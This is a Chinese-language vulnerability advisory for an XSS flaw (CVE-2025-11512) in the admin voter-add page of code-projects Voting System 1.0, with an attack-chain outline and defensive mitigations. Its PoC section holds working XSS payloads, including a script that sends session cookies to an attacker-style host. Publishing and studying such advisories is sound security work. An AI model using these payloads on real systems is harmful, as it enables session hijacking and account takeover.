CVE-2025-11512：code-projects Voting System 1.0 跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-11512

漏洞类型

跨站脚本（XSS）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

code-projects Voting System

漏洞概述

CVE-2025-11512 是 code-projects Voting System 1.0 中存在的一个跨站脚本（XSS）漏洞。该漏洞位于 /admin/voters_add.php 文件中，具体涉及 Firstname、Lastname 和 Platform 参数的输入处理。由于系统未对这些参数进行充分的输入验证和输出编码，攻击者可以通过远程方式向这些参数注入恶意的 JavaScript 代码或 HTML 标签，从而实现跨站脚本攻击。该漏洞的 CVSS 3.1 评分为 4.3，属于中危级别。虽然漏洞的利用需要用户交互（如点击恶意链接或访问恶意页面），且无需认证即可远程利用，但其对完整性和机密性均有一定程度的影响。值得注意的是，该漏洞的利用代码已经公开披露，攻击者可以轻易获取并利用该漏洞进行攻击活动。攻击成功后，攻击者可以窃取用户会话、劫持管理员账户、进行钓鱼攻击或植入恶意脚本，对系统的安全性和用户数据构成严重威胁。

技术细节

该漏洞的根本原因在于 /admin/voters_add.php 文件对用户输入的 Firstname、Lastname 和 Platform 参数缺乏充分的过滤和转义处理。在投票系统的管理员添加选民功能中，这些参数被直接接收并存储到数据库中，而在后续页面渲染时未进行适当的 HTML 编码或转义，导致恶意脚本能够在浏览器上下文中执行。

攻击者可以通过构造包含恶意 JavaScript 代码的请求来利用此漏洞。例如，在 Firstname 参数中注入 <script>alert('XSS')</script> 或使用事件处理器如 <img src=x onerror=alert(document.cookie)> 等 payload。当管理员或用户查看包含该恶意数据的页面时，浏览器会执行注入的脚本。

由于该漏洞的攻击向量为网络（AV:N），无需认证（PR:N），但需要用户交互（UI:R），因此攻击者通常需要通过社会工程学手段诱导受害者点击恶意链接或访问包含恶意代码的页面。攻击成功后，攻击者可以窃取会话 Cookie、进行钓鱼攻击、劫持账户或执行其他恶意操作。该漏洞的利用代码已公开，攻击门槛较低。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统运行 code-projects Voting System 1.0，并定位到 /admin/voters_add.php 端点。

STEP 2

步骤2：构造恶意载荷

攻击者构造包含恶意 JavaScript 代码的 XSS payload，通过 Firstname、Lastname 或 Platform 参数进行注入。

STEP 3

步骤3：投递恶意请求

攻击者通过社会工程学手段（如钓鱼邮件、即时消息等）诱导管理员或用户提交包含恶意 payload 的请求。

STEP 4

步骤4：脚本执行

当受害者查看包含恶意数据的页面时，浏览器执行注入的 JavaScript 代码。

STEP 5

步骤5：数据窃取与权限提升

攻击者窃取会话 Cookie、管理员凭证或执行其他恶意操作，可能导致账户劫持和数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-11512 XSS PoC for code-projects Voting System 1.0 -->
<!-- Vulnerable endpoint: /admin/voters_add.php -->
<!-- Vulnerable parameters: Firstname, Lastname, Platform -->

<!-- Method 1: Simple script injection via POST request -->
<form action="http://target.com/admin/voters_add.php" method="POST">
    <input type="hidden" name="Firstname" value="<script>alert('XSS')</script>">
    <input type="hidden" name="Lastname" value="<img src=x onerror=alert(document.cookie)>">
    <input type="hidden" name="Platform" value="<svg onload=alert('XSS')>">
    <input type="submit" value="Submit">
</form>

<!-- Method 2: URL-encoded payload for direct injection -->
<!-- POST /admin/voters_add.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

Firstname=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&Lastname=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&Platform=%3Csvg+onload%3Dalert%281%29%3E
-->

<!-- Method 3: Session hijacking payload -->
<!-- Firstname=<script>document.location='http://attacker.com/steal?c='+document.cookie</script> -->

影响范围

code-projects Voting System 1.0

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）在 Web 应用防火墙（WAF）中部署针对 /admin/voters_add.php 端点的 XSS 防护规则，过滤常见的 XSS payload 模式；2）通过反向代理或中间件对 Firstname、Lastname、Platform 参数进行输入过滤，拒绝包含 <、>、"、'、(、)、script、onerror 等危险字符的请求；3）在输出层面对这些参数进行 HTML 实体编码；4）限制 /admin/ 目录的访问权限，仅允许可信 IP 访问；5）部署 CSP 头策略，限制内联脚本执行；6）监控异常的用户提交行为，及时发现和阻断攻击。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11512
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11512
3 Details https://www.cvedetails.com/cve/CVE-2025-11512/
4 VulDB https://vuldb.com/cve/CVE-2025-11512
5 Link https://code-projects.org/
6 Link https://github.com/underatted/CVE/issues/14
7 Link https://vuldb.com/?ctiid.327637
8 Link https://vuldb.com/?id.327637
9 Link https://vuldb.com/?submit.669497
10 Link https://github.com/underatted/CVE/issues/14